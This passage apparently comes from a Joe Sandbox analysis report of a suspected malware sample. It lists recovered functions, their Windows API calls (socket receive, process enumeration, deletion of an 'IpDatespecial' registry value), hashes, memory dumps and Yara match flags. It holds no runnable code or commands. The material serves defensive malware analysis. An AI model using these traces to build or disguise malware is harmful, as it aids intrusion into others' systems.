                                                                                                                            • Instruction ID: 051f9688292ea5f617b7e4182f037b54663bc62a36a94622e7b923757b0c8de7
                                                                                                                            • Opcode Fuzzy Hash: c323fdfa23d9c07a91e18cb5d248105b0a2b7f610779fe5a534d5c1d18244fb6
                                                                                                                            • Instruction Fuzzy Hash: 36F0907A2046145BC220EBA9DC84C4BF3E9EFC8720B254B09F26583398CB71E801CFA4
                                                                                                                            APIs
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03623311
                                                                                                                            • Sleep.KERNEL32(00000258), ref: 0362331E
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 03623326
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03623332
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0362333A
                                                                                                                            • Sleep.KERNEL32(0000012C), ref: 0362334B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3137405945-0
                                                                                                                            • Opcode ID: 6ed473f93e6312056217b82ca7f7b011d665b7c2601e69d364240a0d24b506d9
                                                                                                                            • Instruction ID: 055a4584165024709de7a5b3e46d37c52f33815d0037661fb8bcf9e895b1678a
                                                                                                                            • Opcode Fuzzy Hash: 6ed473f93e6312056217b82ca7f7b011d665b7c2601e69d364240a0d24b506d9
                                                                                                                            • Instruction Fuzzy Hash: C8F082762047046BD710ABA9DC84D57F3E8AF89334B204B09F321832D8CAB1E801CB64
                                                                                                                            APIs
                                                                                                                            • ___BuildCatchObject.LIBCMT ref: 02C43A63
                                                                                                                              • Part of subcall function 02C439BE: ___BuildCatchObjectHelper.LIBCMT ref: 02C439F4
                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 02C43A7A
                                                                                                                            • ___FrameUnwindToState.LIBCMT ref: 02C43A88
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                            • String ID: csm$csm
                                                                                                                            • API String ID: 2163707966-3733052814
                                                                                                                            • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                                            • Instruction ID: 29f53475c15a3e065016b1c13adf33219c4d4b506a2d5b25594de23309eb568c
                                                                                                                            • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                                            • Instruction Fuzzy Hash: 1001E43144114ABBDF12AF91CC45EEB7E6AFF88354F204055BD5816120DB36D9B1EBA1
                                                                                                                            APIs
                                                                                                                            • ___BuildCatchObject.LIBCMT ref: 0364096E
                                                                                                                              • Part of subcall function 036408C9: ___BuildCatchObjectHelper.LIBCMT ref: 036408FF
                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 03640985
                                                                                                                            • ___FrameUnwindToState.LIBCMT ref: 03640993
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                            • String ID: csm$csm
                                                                                                                            • API String ID: 2163707966-3733052814
                                                                                                                            • Opcode ID: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                                                                                                            • Instruction ID: cd7dfadee752ca90d4d5c282e8d27193c2c955ca47f5098baa1bb3b005d0cc74
                                                                                                                            • Opcode Fuzzy Hash: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                                                                                                            • Instruction Fuzzy Hash: EE01F676801219BBEF12AF51CD44EAABF6AEF09350F048018FE5819220D736D9B1DBA4
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 0362B800
                                                                                                                            • RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 0362B810
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0362B81B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseDeleteOpenValue
                                                                                                                            • String ID: Console$IpDatespecial
                                                                                                                            • API String ID: 849931509-1840232981
                                                                                                                            • Opcode ID: 0d47c30e5307ee0d0e5c1ecb5e219dd90a6f5b7b02d938f45d8ae9db996b8c11
                                                                                                                            • Instruction ID: 318320c5b1dad7821d5201cd4313a6b42cd1b9da05edba7eaf29b1fbb6b0b695
                                                                                                                            • Opcode Fuzzy Hash: 0d47c30e5307ee0d0e5c1ecb5e219dd90a6f5b7b02d938f45d8ae9db996b8c11
                                                                                                                            • Instruction Fuzzy Hash: 3AE08676B45240AFD324A6A0AC5FFA97794F78CB11F10491DF785A1145C652E440C665
                                                                                                                            APIs
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,95401134), ref: 0362B9DA
                                                                                                                            • _memset.LIBCMT ref: 0362B9FB
                                                                                                                            • _memset.LIBCMT ref: 0362BA4B
                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0362BA65
                                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0362BAB7
                                                                                                                              • Part of subcall function 0362F707: _malloc.LIBCMT ref: 0362F721
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Process32_memset$CreateFirstNextSnapshotToolhelp32_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2416807333-0
                                                                                                                            • Opcode ID: addda7873b0edb68152d43bcabc0ad9a29b243fb36194565db9ea1779045b45f
                                                                                                                            • Instruction ID: fcd2247551a3d3226f435f41abcab9c98bc9522ecc0219caf6d61bcc9dd54c43
                                                                                                                            • Opcode Fuzzy Hash: addda7873b0edb68152d43bcabc0ad9a29b243fb36194565db9ea1779045b45f
                                                                                                                            • Instruction Fuzzy Hash: D3411771A00A25AFE710DF60CC85FAABFB8EF05710F068298E9159B3C0E7B59940CF95
                                                                                                                            APIs
                                                                                                                            • recv.WS2_32(?,?,00000598,00000000), ref: 02C33CBF
                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,02C3399F,?,?,00000000,000000FF,00000000), ref: 02C33CFA
                                                                                                                            • GetLastError.KERNEL32(00000000), ref: 02C33D45
                                                                                                                            • WSAGetLastError.WS2_32(?,?,02C3399F,?,?,00000000,000000FF,00000000), ref: 02C33D7B
                                                                                                                            • WSASetLastError.WS2_32(0000000D,?,?,02C3399F,?,?,00000000,000000FF,00000000), ref: 02C33DA2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$recv
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 316788870-0
                                                                                                                            • Opcode ID: f7f2b4ec7c5526a2b83ea0fbcf803a2da0a6415b360af238ac72a7bcbb0f6036
                                                                                                                            • Instruction ID: c34ad139c6fcbd992f79b119d88675dfe57e3fbedf5a176de00071f5f7693592
                                                                                                                            • Opcode Fuzzy Hash: f7f2b4ec7c5526a2b83ea0fbcf803a2da0a6415b360af238ac72a7bcbb0f6036
                                                                                                                            • Instruction Fuzzy Hash: EB310B766142408FEB65DF68E8C876A37A9FB84324F500EA6EE05CF285D775D880CBD1
                                                                                                                            APIs
                                                                                                                            • recv.WS2_32(?,?,00000598,00000000), ref: 03623CBF
                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,0362399F,?,?,00000000,000000FF,00000000), ref: 03623CFA
                                                                                                                            • GetLastError.KERNEL32(00000000), ref: 03623D45
                                                                                                                            • WSAGetLastError.WS2_32(?,?,0362399F,?,?,00000000,000000FF,00000000), ref: 03623D7B
                                                                                                                            • WSASetLastError.WS2_32(0000000D,?,?,0362399F,?,?,00000000,000000FF,00000000), ref: 03623DA2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$recv
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 316788870-0
                                                                                                                            • Opcode ID: 68a488411af9130fb830f5e7f9af599b21fb540ee184ef914c86cbcd06287a7f
                                                                                                                            • Instruction ID: 13ab5617299c9a26bd6cda7996737298c08fa0da89e51edb803f8b4d5ce2d192
                                                                                                                            • Opcode Fuzzy Hash: 68a488411af9130fb830f5e7f9af599b21fb540ee184ef914c86cbcd06287a7f
                                                                                                                            • Instruction Fuzzy Hash: 8031C47AB046208BEB14DF68D4C8B6A7F69FB85320F26056AED05CB389D735D8818E51
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 02C3E5E5
                                                                                                                              • Part of subcall function 02C36E83: __FF_MSGBANNER.LIBCMT ref: 02C36E9C
                                                                                                                              • Part of subcall function 02C36E83: __NMSG_WRITE.LIBCMT ref: 02C36EA3
                                                                                                                              • Part of subcall function 02C36E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F), ref: 02C36EC8
                                                                                                                            • _free.LIBCMT ref: 02C3E5F8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap_free_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1020059152-0
                                                                                                                            • Opcode ID: 7759bcfdb2ea5db167d5025b9fcfe7278409d5205cb8fadd6f266d5ddde6e614
                                                                                                                            • Instruction ID: 9bafd670ca6b1b5266c96b45ed255581e19bd295ad76c4b2f586ddc13b62aad5
                                                                                                                            • Opcode Fuzzy Hash: 7759bcfdb2ea5db167d5025b9fcfe7278409d5205cb8fadd6f266d5ddde6e614
                                                                                                                            • Instruction Fuzzy Hash: D411C673944619ABCB232B74AC08B9A37F6AF803A0B100D25F859AB181EB34C9509F94
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 03630EF9
                                                                                                                              • Part of subcall function 0362F673: __FF_MSGBANNER.LIBCMT ref: 0362F68C
                                                                                                                              • Part of subcall function 0362F673: __NMSG_WRITE.LIBCMT ref: 0362F693
                                                                                                                              • Part of subcall function 0362F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76), ref: 0362F6B8
                                                                                                                            • _free.LIBCMT ref: 03630F0C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap_free_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1020059152-0
                                                                                                                            • Opcode ID: f55b0f24eb0d05121d1125aaf7995a881b2d6313ca86af68d047e5051f6fbbcf
                                                                                                                            • Instruction ID: 7ade2a239ebec06e6c23da069395526cd17630a10f7cb009220a10119a1989bb
                                                                                                                            • Opcode Fuzzy Hash: f55b0f24eb0d05121d1125aaf7995a881b2d6313ca86af68d047e5051f6fbbcf
                                                                                                                            • Instruction Fuzzy Hash: CB110D36808B297FCB21FF75B90465A3FA99F422A0B25042DFC4B9F244DB34C5418B98
                                                                                                                            APIs
                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 02C32BFF
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 02C32C15
                                                                                                                            • TranslateMessage.USER32(?), ref: 02C32C24
                                                                                                                            • DispatchMessageW.USER32(?), ref: 02C32C2A
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02C32C38
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2015114452-0
                                                                                                                            • Opcode ID: 8ee86384ccf4161be50fb6a3545bbe4660208715e977ed50cc4244dd9b69a2f4
                                                                                                                            • Instruction ID: 0cbf1139ae1832a60f49f2a946339fc448ecd9b5f2a7619aa93601092116bd66
                                                                                                                            • Opcode Fuzzy Hash: 8ee86384ccf4161be50fb6a3545bbe4660208715e977ed50cc4244dd9b69a2f4
                                                                                                                            • Instruction Fuzzy Hash: 9A01A976A8030977EE219AA59C41FFB73ACAB54B50F504E11FF05EA0C4DAA0E901C7B5
                                                                                                                            APIs
                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 03622C3F
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 03622C55
                                                                                                                            • TranslateMessage.USER32(?), ref: 03622C64
                                                                                                                            • DispatchMessageW.USER32(?), ref: 03622C6A
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 03622C78
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2015114452-0
                                                                                                                            • Opcode ID: 1236c3a41a4ddb4c2242ee981dbf9cdb10031b0e1a04c6fefe9e72bc2d12c4a3
                                                                                                                            • Instruction ID: 2204bfff4d095b3a3141f0ee513a2c0b6077f5d0d931a8ad21cb5629f7f84d57
                                                                                                                            • Opcode Fuzzy Hash: 1236c3a41a4ddb4c2242ee981dbf9cdb10031b0e1a04c6fefe9e72bc2d12c4a3
                                                                                                                            • Instruction Fuzzy Hash: C701D632F5031EB6E750E6A49D91FFB776CAB45B20F114A01FB00EA1C8D6A1A4018BA9
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 02C34B63
                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 02C34B6D
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 02C34B80
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 02C34B83
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3168844106-0
                                                                                                                            • Opcode ID: ceb3d1ae96895c94ac275b41c2eb214dc1e8eb912d296851b49ea345712976c8
                                                                                                                            • Instruction ID: 16623d430faf6faf339218e59afa3269987a5fcd57cf5614360752e1b88c18b5
                                                                                                                            • Opcode Fuzzy Hash: ceb3d1ae96895c94ac275b41c2eb214dc1e8eb912d296851b49ea345712976c8
                                                                                                                            • Instruction Fuzzy Hash: E6012C7AA006149FD7219B29FC84B9BB7E8AB88268F054D29E14683600C774FC458AA0
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 03624B83
                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 03624B8D
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 03624BA0
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 03624BA3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3168844106-0
                                                                                                                            • Opcode ID: c6c4b94705998e1b984a06d4bcb506cc38385ef506af8ad77eb087aa606abc7f
                                                                                                                            • Instruction ID: f36a648b47c0876be8b48d7530b323c18587b7afb6c3467365948a8ed3393b60
                                                                                                                            • Opcode Fuzzy Hash: c6c4b94705998e1b984a06d4bcb506cc38385ef506af8ad77eb087aa606abc7f
                                                                                                                            • Instruction Fuzzy Hash: 5D01847A5046244FD721EB36FDC4B9BB7F8EF88215F150859F10683604C734E845CA64
                                                                                                                            APIs
                                                                                                                            • __CreateFrameInfo.LIBCMT ref: 028936A2
                                                                                                                              • Part of subcall function 02893232: __getptd.LIBCMT ref: 02893240
                                                                                                                              • Part of subcall function 02893232: __getptd.LIBCMT ref: 0289324E
                                                                                                                            • __getptd.LIBCMT ref: 028936AC
                                                                                                                              • Part of subcall function 028898E6: __getptd_noexit.LIBCMT ref: 028898E9
                                                                                                                              • Part of subcall function 028898E6: __amsg_exit.LIBCMT ref: 028898F6
                                                                                                                            • __getptd.LIBCMT ref: 028936BA
                                                                                                                            • __getptd.LIBCMT ref: 028936C8
                                                                                                                            • __getptd.LIBCMT ref: 028936D3
                                                                                                                              • Part of subcall function 028932D7: __CallSettingFrame@12.LIBCMT ref: 02893323
                                                                                                                              • Part of subcall function 028937A0: __getptd.LIBCMT ref: 028937AF
                                                                                                                              • Part of subcall function 028937A0: __getptd.LIBCMT ref: 028937BD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135368981.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2880000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3282538202-0
                                                                                                                            • Opcode ID: 2f8cf262afac08e33e01d992e0837c391acebccb040fbf70ddcfda8d5a1f53bb
                                                                                                                            • Instruction ID: 9f562da0054c9847d26542a1764dca9d0c54cea5de4b13d1e3d32c1b15944322
                                                                                                                            • Opcode Fuzzy Hash: 2f8cf262afac08e33e01d992e0837c391acebccb040fbf70ddcfda8d5a1f53bb
                                                                                                                            • Instruction Fuzzy Hash: 4011C6B9C00209DFDF00EFA8C944AAD7BB1FF08314F1484A9E814EB250EB39AA559F51
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 02C3E14B
                                                                                                                              • Part of subcall function 02C3990F: __getptd_noexit.LIBCMT ref: 02C39912
                                                                                                                              • Part of subcall function 02C3990F: __amsg_exit.LIBCMT ref: 02C3991F
                                                                                                                            • __getptd.LIBCMT ref: 02C3E162
                                                                                                                            • __amsg_exit.LIBCMT ref: 02C3E170
                                                                                                                            • __lock.LIBCMT ref: 02C3E180
                                                                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 02C3E194
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 938513278-0
                                                                                                                            • Opcode ID: d3cb5cb5a1a7e83140845e9b86113dc6d76f3fcdb5d2557dd65b84e2fdb79deb
                                                                                                                            • Instruction ID: 878377ca638dd211eb7a2a35fc632c334fe21e1192a0d1072bda48fd1bbcb795
                                                                                                                            • Opcode Fuzzy Hash: d3cb5cb5a1a7e83140845e9b86113dc6d76f3fcdb5d2557dd65b84e2fdb79deb
                                                                                                                            • Instruction Fuzzy Hash: 8BF0B432D447209BE737BBB8980279E33E26F00B20F148E09D455672C1CFB45601EF55
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 03635012
                                                                                                                              • Part of subcall function 03633E5B: __getptd_noexit.LIBCMT ref: 03633E5E
                                                                                                                              • Part of subcall function 03633E5B: __amsg_exit.LIBCMT ref: 03633E6B
                                                                                                                            • __getptd.LIBCMT ref: 03635029
                                                                                                                            • __amsg_exit.LIBCMT ref: 03635037
                                                                                                                            • __lock.LIBCMT ref: 03635047
                                                                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0363505B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 938513278-0
                                                                                                                            • Opcode ID: dcdbb2e437936cf5fa73adda1a4e65b40d3c662cca0b160b2bf41d911b5276b0
                                                                                                                            • Instruction ID: 221c3ba6427ec8d18463d4e2523f1aa3c425b84323ee9ca2f6f8c762cf8645f7
                                                                                                                            • Opcode Fuzzy Hash: dcdbb2e437936cf5fa73adda1a4e65b40d3c662cca0b160b2bf41d911b5276b0
                                                                                                                            • Instruction Fuzzy Hash: AFF0903A945700DAE761FBA99801B8EB3E0AF03B20F14010DD6266F3C0CF3584418B9E
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 0288E122
                                                                                                                              • Part of subcall function 028898E6: __getptd_noexit.LIBCMT ref: 028898E9
                                                                                                                              • Part of subcall function 028898E6: __amsg_exit.LIBCMT ref: 028898F6
                                                                                                                            • __getptd.LIBCMT ref: 0288E139
                                                                                                                            • __amsg_exit.LIBCMT ref: 0288E147
                                                                                                                            • __lock.LIBCMT ref: 0288E157
                                                                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0288E16B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135368981.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
